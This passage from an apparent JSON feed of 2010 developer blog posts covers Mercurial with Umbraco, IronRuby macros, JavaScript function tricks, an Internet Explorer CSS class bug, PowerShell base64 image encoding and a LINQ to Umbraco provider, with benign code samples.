commits, etc. This is a handy way to find out what you want to update to without having to go to CodePlex A command line tip One of the really nice things about the Mercurial command line tools is that you can use shorthand to execute a command. Basically when you type a command in shorthand Mercurial will try and find the command that matches it, so for example if I was to type hg up Release-4.5.2 Mercurial will see that I’ve typed up and that up only matches the update command.\nIf you don’t supply enough characters, ie: hg c https://hg01.codeplex.com/umbraco then Mercurial will tell you that it doesn’t know what you were trying to execute.\nNamed branches as awesome Anyone who’s tried to bugfix Umbraco or wanted to compile a version themselves will appreciate the pain which the TFS structure was causing (this isn’t a bash at TFS, it wasn’t entirely TFSs fault that it was hard, it was a combination of different factors, so don’t take this as a diss at TFS). Now with the migration it should be a whole lot easier.\nSay you find a bug in your 4.5.2 install and you want to try and debug it yourself. Here’s how you’d go about it:\nOpen up your favorite console (cmd.exe, powershell, etc) and navigate to a folder you want to put the Umbraco source Execute: hg cl https://hg01.codeplex.com/umbraco; hg up Release-4.5.2; Open the .sln file in Visual Studio Yes, it’s just that easy! Now you can debug the code to your hearts content.\nConclusion This was just a quick walkt through of how the move to Mercurial with Umbraco is going to make it simpler for developers to interact with the Umbraco source code.\nHappy Hacking :)\n", "id": "2010-12-11-mercurial-101-for-umbraco-developers" }, { "title": "WhatKey.net, a simple way to find JavaScript keycodes", "url": "https://www.aaron-powell.com/posts/2010-12-07-whatkey-net-for-your-javascript-keycode-glory/", "date": "Tue, 07 Dec 2010 00:00:00 +0000", "tags": [ "whatkey", "javascript", "web", "project" ], "description": "An overview of a simple site which helps JavaScript developers working with keyboard events", "content": "Today while preparing a set of slides for an upcoming talk I decided that I wanted to do the slides as a series of web pages, the problem is that I still wanted to be able to use my Logitech clicker. Since it ‘just works’ when I plug it in I figured it was firing some simple keyboard events, but the question is, what keyboard events is it firing?\nI fired up Chrome, opened the JavaScript console and added a body keypress event to capture the keycode. Sweet, got what I needed, but it was a bit of a pain in the ass to do, I just wished there was a simpler way to find it, and what if I need to get them again, I’ve gotta write little handler again.\nIt’s just one of those things that you don’t need all that often, but it’s just a tedious task to get done.\nAs they say, the necessity is the mother of all invention, so I decided to whip up a simple website which anyone can use, available at http://whatkey.net.\nAll you need to do is fire up http://whatkey.net and press the key that you want, this give you the keycode for the keydown event in big letters. If you want to check different keyboard events, like keypress or keyup then you can access them by going to http://whatkey.net/keypress or http://whatkey.net/keyup.\nBest of all this whole application is done in about 20 lines of code (source code is on GitHub), it runs Ruby, using Sinatra and hosted on Heroku.\nHopefully this tool becomes useful to other web developers out there.\n", "id": "2010-12-07-whatkey-net-for-your-javascript-keycode-glory" }, { "title": "Ole Erling appears in NodeJS", "url": "https://www.aaron-powell.com/posts/2010-12-04-ole/", "date": "Sat, 04 Dec 2010 00:00:00 +0000", "tags": [ "umbraco", "nodejs" ], "description": "Having some fun with NodeJS and a crazy Danish dude", "content": "People would probably agree that I’m not the most normal of people when it comes to developing software. Quite often something takes my fancy, and I have a crack at building with it, whether it is a good idea or not.\nRecently there’s been a lot of fuss on Twitter about a Ruby project which has recently gone into v1.0 called Sinatra. It’s got a rather nice syntax if you’re trying to build a quick-fire application, here’s the Hello World example from the site:\nrequire 'sinatra' get '/hi' do "Hello World!" end In fact in about 15 minutes I threw together a new site for some quick linking at slace.biz, from which you can jump to /umbraco or get some basic contact info via /me.\nHaving fun with NodeJSIt’s no secret that I’m a fan of JavaScript, especially if I want to do something that’s a little… strange.\nSo after playing with Sinatra for a bit I decided “Why can’t I just built it in JavaScript?”. Oh sure, it’s been done before, but reinventing wheels are fun.\nThis isn’t really a serious attempt, it’s just a bit of fun and a bit of a learning experiment, so I decided that taking the piss would be the best way to go about it. To do this I decided to create my own framework, a framework inspired by a Danish ‘musician’ called Ole Erling.\nThe source code is available on my bitbucket, if you want to grab it it’s here.\nDesign of OleThe design of Ole is to be a fun one (remember: piss-take!) and to work with it you have a fluent API which you can work with. The first thing that Ole must do is enter the room (well, the file):\nvar ole = requires('./src/ole').enters(); Now that Ole is in the room you can get him to do things, such as listen to HTTP events:\nole.hears('GET', '/', function(req, res) { res.end('Hello World!'); }); What I’ve said is that when Ole hears a GET HTTP request on the URL / it will execute a particular function. Ole can hear all four HTTP request modes, GET/ POST/ PUT and DELETE, it’s up to you how you want to implement them.\nOnce you’re said what Ole can hear you better get him to play it set:\nole.play(); Currently Ole will only play on port 2009 (spot the in-joke there :P) on localhost.\nConclusionAs I’ve said, this is a bit of a joke project that I’m working on, currently I’m hanging out to get a beta invite on heroku.com’s NodeJS support, or the no.be beta project, and when I do expect a site running Ole to go live :D.\nPlease feed free to get Ole running a set for you too ;).\n", "id": "2010-12-04-ole" }, { "title": "Creating a menu in Umbraco with IronRuby", "url": "https://www.aaron-powell.com/posts/2010-11-27-umbraco-menu-with-ironruby/", "date": "Sat, 27 Nov 2010 00:00:00 +0000", "tags": [ "umbraco", "ironruby" ], "description": "No more XSLT, DRL for the win", "content": "Recently I’ve been help a client migrate a number of unmanaged microsites into an Umbraco instance, and since it’s well known that I’m not a fan of XSLT an alternative is in order. While working at TheFarm I wrote a blog about the different macro options and what we were doing back then. Since moving on I’ve been wanting to avoid using XSLT at all.\nUmbraco has supported DLR languages like IronPython and IronRuby for quite some time, so I decided to look into it for this new project.\nSo with the help of fellow Readifarian Thomas Johansen we set about doing a migration of the microsites and running IronRuby where possible (Thomas is a Ruby fan so that’s why we’re choosing IronRuby here).\nOne of the most common macros I was still writing in XSLT is a navigation, so lets look at how we can do this with IronRuby.\nNote: With this I’m working on an Umbraco 4.5.2 version of Umbraco, using .NET 3.5\nGetting your script ready One of the nice things about XSLT is that you can load in XSLT extensions, you know that section at the top of your XSLT file which you need specify xmlns:umbraco.library="urn:umbraco.library" and so on, well we need to do a similar thing in IronRuby so we have access to the umbraco.library object.\nBut what’s different here is we just need to open the appropriate objects:\nLibrary = Object.const_get("umbraco").const_get("library") What this is doing is opening the umbraco namespace and then getting the library object from within it (you can chain as many namespaces together as you need to do this too).\nGetting the starting node At the moment our sites are only one level deep so we’re being a bit lazy with the loading of the root most node, but basically we want to find a parent some way. Like an XSLT DLR script are provided with the current page node in the form of a currentPage object, so we’ll grab it from here:\nparent = currentPage.Parent Building our HTML Now that we have our starting node we need to start constructing a navigation, that’s as easy as just writing HTML to the screen:\nputs '<nav><ul id="navigation">' parent.Children.find_all { |c| c.GetProperty("umbracoNaviHide").Value != "1" }.each_with_index do |child, i| puts %Q{ <li class="#{'first' if i == 0}"> <a href="#{Library.NiceUrl(child.Id)}" class="#{'selected' if child.Id == currentPage.Id}" target="_self" title="Go to #{child.Name}">#{child.Name}</a> </li> } end puts '</ul></nav> Here what we’re doing is creating some HTML which is a HTML5 <nav> element that then encloses a <ul> element. What’s primarily of interest in this script section is the loop.\nWe’re doing a few things here, first we’re using the find_all method (you could use a select instead if you want, Ruby has a dozen ways to do the same thing :P). This method we’re doing a filter on the children, ignoring the ones which we want to hide, but you can add what ever conditions you want in there (the c variable is an instance of Node from the Umbraco API). Once we’re got our filtered collection we are then looping through each one using the each_with_index method which provides us again with the instance of a Node and the position in the array (which is i if you’re not following).\nA really cool thing about Ruby is how you can do string formatting, unlike .NET you can put complex logic in your string formatting, which is denoted by the #{ ... } syntax, here we’re doing a few things such as:\n#{'first' if i == 0} What this does is returns a value of first when the if condition is true, and this is how we can put a class on the first item in the navigation.\nWe’re also capable of doing other complex things like\n#{Library.NiceUrl(child.Id)} And get the URL of the page in-place.\nWrapping it all up Here’s the completed script:\nLibrary = Object.const_get("umbraco").const_get("libary") parent = currentPage.Parent puts '<nav><ul id="navigation">' parent.Children.find_all { |c| c.GetProperty("umbracoNaviHide").Value != "1" }.each_with_index do |child, i| puts %Q{ <li class="#{'first' if i == 0}"> <a href="#{Library.NiceUrl(child.Id)}" class="#{'selected' if child.Id == currentPage.Id}" target="_self" title="Go to #{child.Name}">#{child.Name}</a> </li> } end puts '</ul></nav>' That’s a total of 13 lines (including whitespace, which can be condensed to just 7 lines if you change whitespace and HTML formatting) of Ruby code which can build a navigation which will suite a lot of needs. Compare this to the template for NavigationPrototype.xslt which ships within an Umbraco install that is 40 lines (ok, fine it does have comments :P). Not bad me things, not bad…\nConclusion IronRuby is a great alternative to writing small macros in Umbraco, it’s a great alternative to using XSLT. If you’re a developer I strongly recommend you look into the DLR support for your Umbraco projects.\nBonus - making a recursive menu systemIn the above code we’ve make a simple menu system that has a known starting point, but as I pointed out it’s not great if you wanted to have a recursive one? Well let’s have a look at what is required to do that.\nRecursively finding a parent The first thing we need to do is work out how to translate this XPath statement (that’s from the template shipped in Umbraco):\n$currentPage/ancestor-or-self::node [@level=$level]/node [string(data [@alias='umbracoNaviHide']) != '1'] into something in Ruby.\nBut there’s a problem, we’re checking against the @level attribute in XSLT, but the Node object in the Umbraco API doesn’t have a Level property! Damn that’s going to make my life harder isn’t it… Well good news is you can get around this with a bit of trickery. What we’re going to do is work against the Id property… but hang on, we don’t know what the Id is of the node at the level we want, and like hell do I want to hard code that anywhere. Well here’s where the trickery comes in.\nThe Node object has a property on it for the Path, we can use that to fake the level. Since a path is always in a known format, a comma-separated string, we can make that into an array, and then path-from-there ;).\nlevel = 2 target_parent_id = currentPage.Path.split(',')[level].to_i rescue -1 Since we’re working with microsites here I don’t want the upper-most navigation point for the site, I want the point from the current microsite, so I’m finding the ID of the node at level 2, if you were doing a full site specify the array index position (aka level) to be 1.\nWe’re also doing a rescue here, and that will cause -1 to be returned if we for some reason don’t have an array that is at least 3 items long (it’s not required but it’s just safer and easier to recover from if you have an unexpected error).\nYou’ll also notice the to_i on the end, this method will convert the string (ie: “1234”) into a number (ie: 1234).\nNext we to actually find the parent, so we want to simulate the ancestor-or-self XPath select, which is really just a recursive function, and if there’s something that dynamic languages are great for that’s recursive functions.\nparent = currentPage parent = parent.Parent until parent.nil? || parent.Id == target_parent_id So what we’re doing here is calling the until loop method and assigning the value of parent to parent.Parent until one of the conditions returns true. This is similar to a do {...} while(...) statement in .NET languages, just a bit funkier ;).\nBringing it all together In addition to adding recursive parent lookups we’ve also decided to fix the script so that no navigation HTML is generated if there is no navigation to display. This can be done with a single-line if statement, which looks kind of cool:\nreturn if (parent && (parent.Children.empty? || parent.Children.any? {|c| c.GetProperty("umbracoNaviHide").Value != "1" })) || parent.nil? That’ll cause the script to exit if the parent wasn’t found or there aren’t any children to display.\nHere’s what the whole script looks like now:\nLibrary = Object.const_get("umbraco").const_get("library") target_parent_id = currentPage.Path.split(',')[2].to_i rescue -1 parent = currentPage parent = parent.Parent until parent.nil? || parent.Id == target_parent_id return if (parent && (parent.Children.empty? || parent.Children.any? {|c| c.GetProperty("umbracoNaviHide").Value != "1" })) || parent.nil? puts '<nav><ul id="navigation">' parent.Children.find_all { |c| c.GetProperty("umbracoNaviHide").Value != "1" }.each_with_index do |child, i| puts %Q{ <li class="#{'first' if i == 0}"> <a href="#{Library.NiceUrl(child.Id)}" class="#{'selected' if child.Id == currentPage.Id}" target="_self" title="Go to #{child.Name}">#{child.Name}</a> </li> } end puts '</ul></nav>' Happy Ruby-ing :)\n", "id": "2010-11-27-umbraco-menu-with-ironruby" }, { "title": "Some tips and tricks for working with IronRuby and Umbraco", "url": "https://www.aaron-powell.com/posts/2010-11-27-umbraco-ironruby-tips-and-tricks/", "date": "Sat, 27 Nov 2010 00:00:00 +0000", "tags": [ "umbraco", "ironruby" ], "description": "Some things which I've learnt while working with IronRuby in Umbraco", "content": "Note: The following has been tested in Umbraco 4.5.2 on .NET 3.5, and it works on my machine\nModularizing your IronRuby filesHaving the ability to break a large file into a set of smaller files is quite an important aspect of any kind of programming, and it’s a concept that is in all the languages that Umbraco supports. XSTL has <xsl:include, .NET has types, but what about DLR scripts?\nIronRuby (and IronPython) allow you to break files into smaller files, but how do you then include them?\nI’ve seen examples with IronPython of peeople doing Server.MapPath("~/python") and having it all included like that, but with IronRuby (and I’m assuming IronPython) it isn’t that complex.\nScript settings file There’s a file called ~/config/scripting.config which is a little gem here. It’s the file that you modify if you want to do something like add an additional DLR language (like LOLCode), but what’s more interesting is this section:\n<options> </options> Full information about the DLR hosting specification can be found here (and it goes into more details about this config section) but in short you can use this to pass folders into the script.\nHere’s a good sample (and what we’re using):\n<options> <set language="Ruby" options="LibraryPaths" value="python" /> </options> What we’re configuring here is:\nSetting the language to target as Ruby (you can use something from the names part of the language definition Specifying that we want to include the ~/python folder, using the LibraryPaths option. This is the important one, the folders start from the root of your website (ie: /) so anything that’s inside your site can be added (ok, that’s not entirely true but it’s true enough :P) Now when each script is loaded it will include references to anything else in your ~/python folder, sweet :D.\nAdding external files Now that you know how to ensure that all external script files are available to each other how do you actually use them? Well with IronRuby it’s really simple:\nrequires "MyAwesomeRubyScript" Chuck that at the top of your file and then everything will be available to you from that script file. You can even create master includes so you can include specific scripts through 1 additional include:\nSomeIncludes.rb\nrequires "MyAwesomeScript" requires "SomeOtherScript" MainScript.rb\nrequires "SomeIncludes" #work against what was defined in MyAwesomeScript.rb Working with XMLIn case you hadn’t already noticed Umbraco has a lot of integration with XML, and although there is a .NET API and DLR workings sometimes you’re just kind of stuck with XML. Take for example using the Related Links data type, that stores XML into the property value, which is great in XSLT, but how do you go with it in the DLR?\nWell I came across a neat little script today for working with IronRuby and XML, which you can get too. And using the tip from above we can include it into any script file we need.\nLet’s make a basic IronRuby macro which will render a Related Links data type as a <ul>:\nAssumptions: We have the XML helper I linked about in a file called xml.rb. We have a property on the current node called QuickLinks.\nQuickLinks.rb Here’s a simple little Ruby script to turn our property into some HTML:\nrequires 'xml' links = currentPage.get_property('quickLinks').value xmlDoc = Document.new(links) html = '<ul>' i = 0 xmlDoc.elements('links/link') do |e| html << %Q{ <li class="#{'first ' if i == 0 }#{e.get('@type').value}" target="#{'_blank' if e.get('@newwindow').value == '1'}"> <a href="#{e.get('@link').value}" title="#{e.get('@title').value}">#{e.get('@title'}.value</a> </li> } i+=1 end html << '</ul>' puts html This will create a new XML object which we can using in the Ruby script, we then do a XPath statement to find the link items and then iterate through them.\nThe XML library I used has a few shorthand method such as get that allows us to grab a contextual XPath statement result (it translates to XmlNode.SelectSingleNode internally) so we can quickly access the attributes and their values. I’ve also shown you how to use each attribute to build your list.\nAnd you go, a Ruby script which you can use to create your very own related links :).\nRuby-style namingAlthough this tip isn’t specific to the Umbraco usage of IronRuby it’s a good tip to know if you’re doing IronRuby coding. The Ruby naming conventions are not like the .NET naming conventions, rather than using PascalCase they go with underscoring to break up words, so in .NET we’d write a method name like HelloWorld(...) in Ruby we’d write hello_world(...).\nThe smart folks behind IronRuby have taken this into account, and we can actually use Ruby-style naming even with .NET objects.\nPreviously I’ve shown how to build a menu with IronRuby, well if you wanted to make it more Ruby-esq you can actually do this:\nparent.children.find_all { |c| c.get_property("umbracoNaviHide").value != "1" }.each_with_index do |child, i| puts %Q{ <li class="#{'first' if i == 0}"> <a href="#{Library.nice_url(child.id)}" class="#{'selected' if child.id == currentPage.id}" target="_self" title="Go to #{child.name}">#{child.name}</a> </li> } end I’ve done a few subtle changes, like:\nc.get_property("umbracoNaviHide").value Or even\nlibrary.nice_url(c.id) Now it looks truly like a Ruby script, and not a .NET developers wild attempt to be up with the hip kids playing with Ruby :P.\n", "id": "2010-11-27-umbraco-ironruby-tips-and-tricks" }, { "title": "Internet Explorer bug with assigning CSS classes", "url": "https://www.aaron-powell.com/posts/2010-11-10-ie-bug-with-assigning-css-classes/", "date": "Wed, 10 Nov 2010 00:00:00 +0000", "tags": [ "css", "javascript", "internet-explorer", "web" ], "description": "An interesting problem when assigning CSS classes in JavaScript", "content": "Today I was fixing a problem on a site in which some background images weren’t showing up on certain elements in Internet Explorer but they were showing up under Firefox and Chrome.\nThe page is quite a complex one which does a lot of client-side building of DOM elements so I started digging around in there, finding the section which was creating the element.\nThe code was very simple, all it did was create a <span /> tag, assign some CSS classes to it and eventually add it to the DOM. Nothing overly complex about it but it was breaking none-the-less.\nSo I fired up the (lovely…) IE7 (yes, I’m on a SOE with IE7) and inspected the DOM. Sure enough the element was in the DOM, but when I looked at the applied styles in the inspector I noticed that the styles from the CSS class did not exist. According to the DOM inspector the CSS class was applied, just none of the rules were. I started to be confused, I tried manipulating the stylesheet, adding some more sizing to the element, but nothing caused the rules to be applied. But if I started playing in the DOM inspector I could influence it but only with what I was custom adding.\nAfter scratching my head for a while I took another look at the element creation process, and then I noticed something very strange…\nspan.setAttribute('class', 'someClass'); The developer who wrote the JavaScript was using setAttribute method on the DOM element to set the CSS class, not the className property. I’ve never done it via the method, so I changed it to use the property and vola the CSS class was applied!\nI then created a very simple little piece of HTML to test with to ensure it wasn’t something more of a problem from the overall page, but it always fails in IE, here’s my sample code:\n<html> <head> <title>IE CSS assignment testing</title> <style type="text/css"> .c { background-color:#ff0000;} .s { padding-top:10px; background-color:#00ff00;} </style> </head> <body> <div id="s"></div> <script type="text/javascript"> var txt = document.createElement('span'); txt.innerHTML = "Hello World"; txt.setAttribute('class', 'c'); var s = document.getElementById('s');\ts.appendChild(txt); s.setAttribute('class', 's'); </script> </body> </html> Save that as a HTML file and open it in IE7, IE9 Beta (I don’t have 8 or 6 on a machine), Firefox 3.6.11 and Chrome 8. In both the IEs I tested the background colour & padding is not applied, despite the inspector saying that the element has the classes applied to it.\nI’ll be reporting this as a bug in IE shortly, but of future note to developers use element.className not elemnet.setAttribute for CSS class assignment!\n", "id": "2010-11-10-ie-bug-with-assigning-css-classes" }, { "title": "Base64 Encoding of Images via Powershell", "url": "https://www.aaron-powell.com/posts/2010-11-07-base64-encoding-images-with-powershell/", "date": "Sun, 07 Nov 2010 00:00:00 +0000", "tags": [ "powershell" ], "description": "Turning an image into a string... simply", "content": "Recently I was doing some CSS for a client but there was a bit of a problem with putting stuff into source control, basically there was a release coming up from one section of the source tree that I needed to put some images into for the CSS, but because they weren’t approved for this release I couldn’t commit them.\nThe new CSS wasn’t going to be included in this release either, but I wanted to get at least some stuff source controlled (it’s in a different part of the tree so I could commit it) and to achieve this with the images I decided to use base64 encoding.\nIf you’re not aware something that modern browsers (like IE8+, FF, Chrome, etc) are starting to support is RFC 2397 which is also known as the “data” URI scheme. The basic premise behind this (if you’re not interested in reading the whole spec yourself :P) is to allow you to embed an encoded version of a URI response in place of the URI itself. This allows you to do funky stuff like this:\n<IMG SRC="data:image/gif;base64,R0lGODdhMAAwAPAAAAAAAP///ywAAAAAMAAw AAC8IyPqcvt3wCcDkiLc7C0qwyGHhSWpjQu5yqmCYsapyuvUUlvONmOZtfzgFz ByTB10QgxOR0TqBQejhRNzOfkVJ+5YiUqrXF5Y5lKh/DeuNcP5yLWGsEbtLiOSp a/TPg7JpJHxyendzWTBfX0cxOnKPjgBzi4diinWGdkF8kjdfnycQZXZeYGejmJl ZeGl9i2icVqaNVailT6F5iJ90m6mvuTS4OK05M0vDk0Q4XUtwvKOzrcd3iq9uis F81M1OIcR7lEewwcLp7tuNNkM3uNna3F2JQFo97Vriy/Xl4/f1cf5VWzXyym7PH hhx4dbgYKAAA7" ALT="Larry"> This technique can also be used with CSS, in background images, and it’s what I decided to go with. But how do you convert an image to a base64 string? There’s plenty of helper sites on the web, or maybe you can write a C# console application to do it.\nI decided to go a bit different with it, since it was something I’d be doing a few times I wanted it to be quite to write and easy to run, so Powershell was what I decided to go with.\nSo I hit up Jason Stangroome for some Powershell wizardry (read: he told me what to code) and came up with a nifty 2-line Powershell file:\nParam([String]$path) [convert]::ToBase64String((get-content $path -encoding byte)) You then use it like so:\nPS> .\\ImageToBase64.ps1 C:\\Path\\To\\Image.png >> base64.txt Jason thinks you can do it with only a single line script by putting the Param declaration on the same line of convert statement, but I think that having it on 2 lines should be fine :P.\n", "id": "2010-11-07-base64-encoding-images-with-powershell" }, { "title": "JavaScript functions are objects", "url": "https://www.aaron-powell.com/posts/2010-10-23-javascript-functions-are-objects/", "date": "Sat, 23 Oct 2010 00:00:00 +0000", "tags": [ "javascript", "web" ], "description": "JavaScript functions are more than just functions", "content": "I think it’s well known just how much I enjoy JavaScript, especially since there’s a few really funky things I’ve written about in the past.\nBut in this article I’m going to look at something else that’s not commonly realised about JavaScript, that a function is actually just an object.\nFunctions 101 There’s a couple of ways which you can write a function in JavaScript, you can write them anonymously:\n$(function() { //do stuff }); You can name them:\nfunction add(x, y) { return x + y; } Or you can assign them to a variable:\nvar add = function(x, y) { return x + y; }; Each type of function declaration type has a different ideal usage, anonymous functions are best if you’re wanting to pass around single use functions, where as if you’re naming them it’s best if you want to reuse the function and assigning it to a variable (which you can name it at the same time) works in the a very similar fashion (I’m sure there’s differences but I haven’t read the full ECMA 262 spec so I’m not sure the differences :P).\nJavaScript functions always return a value, even if you don’t have a return statement (in which case they return undefined) so you can return objects, built-in types (like boolean, number, etc) or even return functions.\nSo as you can see functions are really quite powerful.\nBeyond function basics Let’s have a look at how we can work with functions beyond the basics of them, let’s take a function that we’re assigning to a variable:\nvar add = function(x, y) { return x + y; }; By doing this we’ve got a variable named add which we can use like this:\nvar x = add(1,1); //x === 2 Well there’s a though, could you add a property to the variable add? Maybe we could use this to add a description for the function that we’re working with…\nadd.desc = "Adds two numbers together"; alert(add.desc); That’s perfectly valid because… functions are objects. That’s right, anything you could do to a “standard object” you can do to a function. In fact, you can even have a function property on a function, like this:\nvar add = function(x, y) { return x + y; }; add.add = add; alert(add.add(1,1)); //alerts 2 Ok, so this isn’t really that useful an example, but it does kind of prove a point.\nThis whole concept of functions-are-objects is core in a lot of JavaScript frameworks. Take jQuery for example, you can do this which will invoke a function:\njQuery('div'); Or you can do this which will work against jQuery as an object:\njQuery.ajax(...); And as you can see it’s all through a single entry point of the jQuery object that we’re either working with it as a function or as an object.\nTaking it another step So if our function is an object, what can we do with it, can we do anything really trippy? How about having a function that describes itself after it runs? How can we do that?\nWhen a function runs there is a special variable which you get passed in called arguments. This variable knows a few things about what’s happening such as:\nThe name of the function The arguments passed into it The object that called the function By using the arguments object we could start describing the function, like so:\nvar add = function(x, y) { arguments.callee.lastCall = { 'x': x, 'y': y }; return x + y; }; add(1,2); alert(add.lastCall.x); //alerts 1 Sweet, we can now find out about the last invocation of the function!\nConclusion In this article we’ve looked into some of the fun things you can do with JavaScript functions, and how you can use a function as more than just a way to perform operations, but get them to describe themselves while they are running.\nWhether or not this is overly ideal in what you’re doing it’s up to you, but it’s definitely something that could be handy if you’re writing your own JavaScript mocking framework :P.\n", "id": "2010-10-23-javascript-functions-are-objects" }, { "title": "DocumentDataProvider - Creating a custom LINQ to Umbraco Tree", "url": "https://www.aaron-powell.com/posts/2010-10-01-documentdataprovider-tree/", "date": "Fri, 01 Oct 2010 00:00:00 +0000", "tags": [ "umbraco", "linq-to-umbraco" ], "description": "Creating a custom LINQ to Umbraco provider - implementing a Tree", "content": "This article covers part of the DocumentDataProvider from the LINQ to Umbraco Extensions project.\nOverviewWhen you create a custom LINQ to Umbraco data provider there are a number of classes which you need to implement, this article will look at how to implement the Tree<T> class.\nBut what is the point of the Tree<T> class for? The class is responsible for most of the heavy lifting for a particular type. The Tree<T> object is actually what is returned when you access a collection from the UmbracoDataContext that you generate from the code generator. It is also what you push new objects into (assuming that the implementation supports CRUD), in fact it’s comparable to the Table<TEntity> class which is used by LINQ to SQL (since LINQ to Umbraco is modeled after LINQ to SQL).\nImplementing Tree<T>To implement the class you need to inherit from the abstract class, umbraco.Linq.Core.Tree<TDocType>, like this:\npublic class DocumentType<TDocType> : Tree<TDocType> { } Next this you have to do is implement the abstract class, of which there are 6 abstract methods and 1 abstract property, so the basic implementation will look like this:\npublic class DocumentType<TDocType> : Tree<TDocType> { public override UmbracoDataProvider Provider { get; protected set; } public override void DeleteAllOnSubmit(IEnumerable<TDocType> items) { throw new NotImplementedException(); } public override void DeleteOnSubmit(TDocType itemm) { throw new NotImplementedException(); } public override IEnumerator<TDocType> GetEnumerator() { throw new NotImplementedException(); } public override void InsertAllOnSubmit(IEnumerable<TDocType> items) { throw new NotImplementedException(); } public override void InsertOnSubmit(TDocType item) { throw new NotImplementedException(); } public override void ReloadCache() { throw new NotImplementedException(); } } Here nothing is implemented, and it’s up to you to work out exactly what you want to implement, the most important one to implement is GetEnumerator(). Since LINQ to Umbraco implements IEnumerable under the hood (not IQueryable) this is the primary method that will be needed, so we’ll focus on that.\nImplementing the constructorThe first step that we need to do is implement a constructor. It’s not really useful if we can’t create the tree that we’re going to be working with then it’s not really useful then is it :P.\nSince I don’t want to have people creating this type themselves, I only want it to be created as part of the overall data provider I’m going to create this as an internal constructor:\nprivate IEnumerable<Document> docs; private DocumentType docType; private UmbracoInfoAttribute umbracoInfoAttribute = ReflectionAssistance.GetUmbracoInfoAttribute(typeof(TDocType)); internal DocumentTree(UmbracoDataProvider dataProvider) { Provider = dataProvider; cache = new Dictionary<int, TDocType>(); docType = DocumentType.GetByAlias(umbracoInfoAttribute.Alias); } Here I’m setting the provider that this instance knows about is actually passed in. Ultimately it is being passed in as a base type, but you can make tighter type if you want. Next I’m setting up a cache for the items that we’re going to be finding in this provider (more on that shortly) and we’re storing the Document Type from Umbraco that maps to the LINQ to Umbraco type that we know about.\nYou’ll notice that I’ve got a field called umbracoInfoAttribute, this is a local reference to the attribute information which LINQ to Umbraco generates. We’ll need this a bit so it’s probably a good idea to keep it handy. The ReflectionAssistance class ships as part of LINQ to Umbraco for your convenience.\nOnward ho!\nImplementing GetEnumeratorNow that we can create out Tree<T> instance lets look at how to implement the GetEnumerator method so we can start retrieving our data.\npublic override IEnumerator<TDocType> GetEnumerator() { //we'll cache the documents from Umbraco if(docs == null) docs = Document.GetDocumentsOfDocumentType(docType.Id); throw new NotImplementedException(); } Cuz we’re going to get all the Document objects from the Umbraco store we’ll actually cache it so we don’t completely hammer the database!\nNext we’ll loop through each of these documents and start creating a LINQ object which maps from it:\npublic override IEnumerator<TDocType> GetEnumerator() { //to try and prevent the performance problems of hitting the DB we'll expect that this may be loaded already if(docs == null) docs = Document.GetDocumentsOfDocumentType(docType.Id); //go through each document foreach (var doc in docs) { int id = doc.Id; //check if we've got a cached version of the doc, if so we'll just use that, otherwise we need to do some setup if (!cache.ContainsKey(id)) { } //use yield return so we can try and squeeze performance out. This way if say you're using a Take you can break early without fully loading the stuff from the DB yield return cache[id]; } } So here’s the skeleton for what we’re going to do, we’ll iterate through all the documents and then look at our LINQ cache, and once it’s in our cache we’ll use yield return so that we can lazy run them (if you’re not familiar with the yield keyword check it out on MSDN).\nNow let’s look at how to create our LINQ object.\nif (!cache.ContainsKey(id)) { //create our LINQ doc and setup the 'standard' properties var linqDoc = new TDocType(); SetupStandardProperties(doc, linqDoc); //find all the user-defined properties, LINQ to Umbraco decorates them with the PropertyAttribute var properties = linqDoc .GetType() .GetProperties(BindingFlags.Public | BindingFlags.Instance) .Where(p => p.GetCustomAttributes(typeof(PropertyAttribute), true).Count() > 0) ; foreach (var p in properties) { //get the UmbracoInfo attribute (it'll have the alias) var attr = ReflectionAssistance.GetUmbracoInfoAttribute(p); //do some case-normalization of the attribute and then we'll grab the value from the document var data = doc.getProperty(Casing.SafeAlias(attr.Alias)).Value; p.SetValue(linqDoc, Convert.ChangeType(data, p.PropertyType), null); } //add the doc to our cache cache.Add(id, linqDoc); } So we’re doing quite a bit of stuff here, first we’re creating a new instance of the object we’re needing, and then we’ll set up the “standard” properties (properties such as ID, NodeName, etc, we’ll look at that implementation shortly).\nNext we want to find all the Umbraco properties, we’ll use reflection to find all the public instance properties (using the BindingFlags enum) that have the attribute of PropertyAttribute which comes from LINQ to Umbraco’s code generator. We do this check because we’re generating partial classes you can add your own properties if you want, properties outside of Umbraco.\nThen we’ll iteration through them all, find the alias from Umbraco and then request the property data from the Umbraco API and lastly set it onto the LINQ object using refelction!\nLastly we put this LINQ object into cache so we don’t have to create it next time.\nPhew, that was a tricky bit!\nAs I mentioned we have a class for setting up the standard Umbraco properties:\nprivate static void SetupStandardProperties(Document doc, TDocType linqDoc) { //set some of the private properties on the object var type = linqDoc.GetType(); { var prop = type.GetProperty("Id"); prop.SetValue(linqDoc, doc.Id, null); } { var prop = type.GetProperty("CreatorID"); prop.SetValue(linqDoc, doc.Creator.Id, null); } { var prop = type.GetProperty("CreatorName"); prop.SetValue(linqDoc, doc.Creator.Name, null); } { var prop = type.GetProperty("Version"); prop.SetValue(linqDoc, doc.Version.ToString(), null); } linqDoc.NodeName = doc.Text; linqDoc.CreateDate = doc.CreateDateTime; linqDoc.UpdateDate = doc.UpdateDate; linqDoc.SortOrder = doc.sortOrder; linqDoc.TemplateId = doc.Template; } You’ll notice four funky things at the top of this method, this is because some of the LINQ to Umbraco properties have private setters, but we can do it with reflection (ahh reflection, is there anything it can’t do :P). There is a good reason that these properties don’t have a public setter, it’s means that some of the stuff can’t be “screwed with” unless you want it to be. Yes this is a design decision that you’ll have to live with :P.\nConclusionSo we’re done with our basic implementation of the DocumentTree<T> class. There’s plenty more things to do if you want to support CRUD operations, and that’ll be covered in a dedicated article.\n", "id": "2010-10-01-documentdataprovider-tree" }, { "title": "A set of extensions for LINQ to Umbraco", "url": "https://www.aaron-powell.com/posts/2010-09-30-linq-to-umbraco-extensions/", "date": "Thu, 30 Sep 2010 00:00:00 +0000", "tags": [ "umbraco", "linq-to-umbraco", "linq-to-umbraco-extensions" ], "description": "Making LINQ to Umbraco way more awesome", "content": "LINQ to Umbraco is awesome, let’s not deny it, but I had a thought of how could I make it even more awesome…\nThere was a lot of things that I wanted to achieve with LINQ to Umbraco that couldn’t be done in the time frame of the Umbraco 4.5 release, and some things which aren’t really applicable in the context of the Umbraco core.\nSo this project will aim to fill in the gaps that LINQ to Umbraco leaves out of the core of Umbraco.\nSource and releases Source Code Current Release (coming soon) DocumentDataProvider Overview\nCreating a DocumentTree class\n", "id": "2010-09-30-linq-to-umbraco-extensions" }, { "title": "JavaScript functions that rewrite themselves for a Singleton pattern", 